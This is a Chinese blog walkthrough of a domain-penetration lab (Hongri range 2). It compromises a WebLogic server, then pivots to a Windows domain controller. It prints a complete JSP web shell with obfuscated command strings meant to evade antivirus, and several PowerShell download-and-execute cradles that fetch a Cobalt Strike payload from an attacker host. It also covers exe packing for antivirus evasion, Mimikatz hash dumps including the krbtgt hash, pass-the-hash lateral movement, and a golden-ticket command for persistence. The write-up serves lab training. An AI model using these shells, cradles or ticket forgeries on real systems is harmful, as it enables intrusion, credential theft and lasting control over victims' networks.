域渗透训练之红日靶场(二)
渗透
渗透
发布日期:   2022-03-31
更新日期:   2022-04-05
阅读次数:   1370

环境

WEB(初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去) windows2008

PC win7

DC win2012

WEB服务器需要以管理员身份手动开启服务,在C:\Oracle\Middleware\user_projects\domains\base_domain\bin下运行批处理程序startWeblogic即可启动weblogic 管理员账号密码:Administrator/1qaz@WSX

拓扑图

img

开日

信息收集

>nmap -sV -Pn -p- -O -v -open -T4 192.168.132.147

img

发现3389,1443,7001

fscan

img

不试永恒之蓝了,电脑垃圾开三个虚拟机要炸了

扫weblogic

img

外网打点

直接打

img

写马

写入位置

https://www.cnblogs.com/sstfy/p/10350915.html

\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp

\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp_WL_internal\uddiexplorer\5f6ebw\war\shell.jsp

\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp_WL_user\项目名\随机字符\war\

扫到 uddiexplorer

img

因为有360,整个绕waf的

<%@ page pageEncoding="utf-8"%>
<%@ page import="java.util.Scanner" %>
<HTML>
<title>Just For Fun</title>
<BODY>
<H3>Build By LandGrey</H3>
<FORM METHOD="POST" NAME="form" ACTION="#">
    <INPUT TYPE="text" NAME="q">
    <INPUT TYPE="submit" VALUE="Fly">
</FORM>

<%
    String op="Got Nothing";
    String query = request.getParameter("q");
    String fileSeparator = String.valueOf(java.io.File.separatorChar);
    Boolean isWin;
    if(fileSeparator.equals("\\")){
        isWin = true;
    }else{
        isWin = false;
    }

    if (query != null) {
        ProcessBuilder pb;
        if(isWin) {
            pb = new ProcessBuilder(new String(new byte[]{99, 109, 100}), new String(new byte[]{47, 67}), query);
        }else{
            pb = new ProcessBuilder(new String(new byte[]{47, 98, 105, 110, 47, 98, 97, 115, 104}), new String(new byte[]{45, 99}), query);
        }
        Process process = pb.start();
        Scanner sc = new Scanner(process.getInputStream()).useDelimiter("\\A");
        op = sc.hasNext() ? sc.next() : op;
        sc.close();
    }
%>

<PRE>
    <%= op %>>
</PRE>
</BODY>
</HTML>

想直接上线cs,有360

img

上线cs过360

https://www.freebuf.com/articles/system/249449.html

先整个冰蝎马

看了篇文章

https://mp.weixin.qq.com/s/wWybPCRsBo0xrvhfYL2YDw

img

选择powershell免杀

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.132.148:80/a'))"

powershell set-alias -name cseroad -value Invoke-Expression;cseroad(New-Object Net.WebClient).DownloadString('http://192.168.132.148:80/a')

echo Invoke-Expression(new-object net.webclient).downloadstring('http://192.168.132.148:80/a') | powershell -
powershell -c "IEX(New-Object Net.WebClient)."DownloadString"('ht‘+’tp://192.168.52.23:80/a')"

发现还是过不了,上绝招

exe加壳

Virus total

img

这个还是比较高,但是火绒还是so easy,360一样过

img

img

img

这里稍微提一点,因为weblogic本身是管理员权限,打进去就是管理员,正常情况下,不会一打就是管理员权限的,所以这边再说一下提权的事

Systeminfo查看补丁

img

这里介绍一款后渗透插件

https://github.com/lintstar/LSTAR

img

可以看到他的功能多么无敌,这就是神器,杀穿

用ms15-051直接提权

img

img

内网信息收集

hash提取

Mimikatz

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
de1ay:1000:aad3b435b51404eeaad3b435b51404ee:3b24c391862f4a8531a245a0217708c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

img

img

拿到主机密码以及mssql密码,存在口令复用,可以发现这个机子被域控用户DC 登录过留下了密码

主机信息收集

Arp -a

img

发现两个网段,我这个4.4有些功能⑧能用 难受

Ladon 扫下

10.10.10.10/24

img

img

之前的arp -a 也能看到

10.10.10.12
10.10.10.81

内网横向移动

利用票据传输横向移动

因为知道域控的对应NTML hash值,

用psexec进行hash传递横向移动,

创建smb监听

img

设置代理

img

img

img

拿下pc

img

拿下域控

img

由此整个环境所有主机全部上线

img

域控权限维持

利用黄金票据

提取域控hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:82dfc71b72a11ef37d663047bc2088fb:::
de1ay:1001:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
mssql:2103:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
DC$:1002:aad3b435b51404eeaad3b435b51404ee:10055c1f67bbd343a2928e43bfe47745:::
PC$:1105:aad3b435b51404eeaad3b435b51404ee:e8061b2e86ac1581b63f698fd24b9be5:::
WEB$:1603:aad3b435b51404eeaad3b435b51404ee:da3963ba5632be9eecaf6e3650559de8:::

黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。

黄金票据的条件要求:

1.域名称

2.域的SID值

3.域的KRBTGT账户NTLM密码哈希

4.伪造用户名

黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。

填好sid 以及NTMLhash

img

就可以通过其他靶机对DC域控进行操控

img

也可以手动使用mimikatz

img

kerberos::golden /admin:test /domain:test.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /krbtgt:161cff084477fe596a5db81874498a24 /ptt

img

文章作者: penson
文章链接: https://www.penson.top
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 penson !
渗透
评论
  目录

梨花香-霜雪千年